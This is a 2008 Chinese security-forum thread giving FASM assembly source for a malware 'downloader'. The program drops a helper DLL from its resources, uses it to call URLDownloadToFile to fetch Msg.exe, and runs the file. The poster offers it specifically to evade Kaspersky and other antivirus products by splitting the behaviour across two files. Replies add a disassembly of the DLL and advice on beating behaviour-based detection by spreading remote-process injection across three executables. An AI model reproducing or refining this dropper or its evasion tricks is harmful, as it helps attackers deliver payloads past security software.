文章作者：洋洒
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

停电停得心情郁闷，没车没得心情郁闷，无聊ing。

内容
如题.不加密.过卡吧.还有别的,自己看去.
.会释放一个impdll.dll然后下载127.0.0.1/Msg.exe并运行
很简单的方法[所以不说了.自己看下文件就知道了].只是没见什么人用过罢了,又无聊,所以贴出来.喜欢的人玩玩..

下面是Exe的代码.

复制内容到剪贴板

代码:

  format PE Gui at $52330000


include '%include%\win32ax.inc'

section '.4s' code readable executable writeable

entry $
  mov ebx,$52330000
  callw FindResource,ebx,impdll,RT_RCDATA
  add bx,word[eax]
  mov ebp,dword[eax+4]
  callw CreateFile,szPath,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_NEW,FILE_ATTRIBUTE_NORMAL,NULL
  callw WriteFile,eax,ebx,ebp,esp,esp,eax,eax
  pop eax
  callw CloseHandle
  xor ebx,ebx
  push ebx ebx szLocFile szNetFile NULL
  callw LoadLibrary,szPath
  add eax,$1060
  call eax
  callw ShellExecute,ebx,ebx,szLocFile,ebx,ebx,SW_SHOW
  callw ExitProcess,ebx
;---------------------------------------data---------------------------------------

szPath db '.\impdll.dll',0
szNetFile db 'http://127.0.0.1/Msg.exe',0
szLocFile db 'Msg.exe',0


data resource
_file 5001,impdll,'1.dll'
end data

dll的代码很简单就一个

复制内容到剪贴板

代码:

jmp dword [UrlDownloadtofile]

都打包在附件里了

其实这种方法两年前就有人用过了 你可以看一下邪八[ 开源代码收集]里的一篇帖子:
三种语言的下载者源代码：C Delphi Vb (另外还有一个我写的C#版本的)
http://forum.eviloctal.com/read-htm-tid-30957.html
先用URLDownloadToFile下载一个文件到本地然后ShellExecute之

JMp???这个对付卡巴还有用吗

引用:

引用第1楼delphiscn于2008-01-30 17:36发表的 :
其实这种方法两年前就有人用过了 你可以看一下邪八[ 开源代码收集]里的一篇帖子:
三种语言的下载者源代码：C Delphi Vb (另外还有一个我写的C#版本的)
http://forum.eviloctal.com/read-htm-tid-30957.html
先用URLDownloadToFile下载一个文件到本地然后ShellExecute之

这个 貌似一楼没有看清.
并非两个函数下载文件
不知你喜欢看武侠小说没?
将无毒的花和无毒的香放在一起便成了剧毒
我要说的是 将这上面的反过来

引用:

引用第2楼erguo于2008-01-30 21:28发表的 :
JMp???这个对付卡巴还有用吗

问题不在这里.
你还是下载附件看看吧
.

将原本被杀的东东分成两部分.
一下子就倒下一片杀软了.
国产av还在特征码杀毒.实在不该..

之前简单逆向过一个下载者就用的你这个方式，好像叫天使下载者。 不过我还是喜欢用WinInet下载或者WinHTTP这样免杀效果更好。

52331000  . 34100000   dd   00001034             ; 结构 'IMAGE_IMPORT_DESCRIPTOR'
52331004  . 00000000   dd   00000000
52331008  . 00000000   dd   00000000
5233100C  . 28100000   dd   00001028
52331010  . 3C100000   dd   0000103C
52331014  . 00000000   dd   00000000             ; 结构 'IMAGE_IMPORT_DESCRIPTOR'
52331018  . 00000000   dd   00000000
5233101C  . 00000000   dd   00000000
52331020  . 00000000   dd   00000000
52331024  . 00000000   dd   00000000
52331028  . 75 72 6C 6D 6>ascii  "urlmon.dLL",0
52331033   00      db   00
52331034  . 44100000   dd   00001044             ; 为 'urlmon.dLL'导入查找表
52331038  . 00000000   dd   00000000
5233103C > . 8B791342   dd   urlmon.URLDownloadToFileA
52331040   00000000   dd   00000000
52331044  . 3352     dw   5233
52331046  . 55 52 4C 44 6>ascii  "URLDownloadToFil"
52331056  . 65 41 00   ascii  "eA",0
52331059  . 00      db   00
5233105A >/$ 31C0     xor   eax, eax
5233105C |. 40      inc   eax
5233105D \. C2 0C00    retn  0C
52331060 > $- FF25 3C103352 jmp   dword ptr [<&urlmon.URLDownloadT>; urlmon.URLDownloadToFileA
52331066  . 00000000   dd   00000000             ; 结构 &#39;IMAGE_EXPORT_DIRECTORY&#39;



jmp   dword ptr [<&urlmon.URLDownloadT>; urlmon.URLDownloadToFileA

fasm~顶~很少看到有fasm的代码出现，就为了这个我也要顶~
新年新气象，，，

说到过行为检测。最好的方法就是多样的工作分开做
举个例子。。。
1.exe,2.exe,3.exe
1.exe负责远程进程申请
2.exe负责写远程代码
3.exe负责创建远程线程

一个任务多个进程完成。。。规则判断是判断一个进程的规则
如果我们分工合作的话。。。AV就未必有这么好的AI技术了~~

引用:

原帖由 Anskya 于 2008-2-4 14:55 发表
fasm~顶~很少看到有fasm的代码出现，就为了这个我也要顶~
新年新气象，，，

说到过行为检测。最好的方法就是多样的工作分开做
举个例子。。。
1.exe,2.exe,3.exe
1.exe负责远程进程申请
2.exe负责写远程代码
3.exe负责创建 ...

不错不错.  可惜我不喜欢把文件分太多份了..
方法这样就对了 .:lol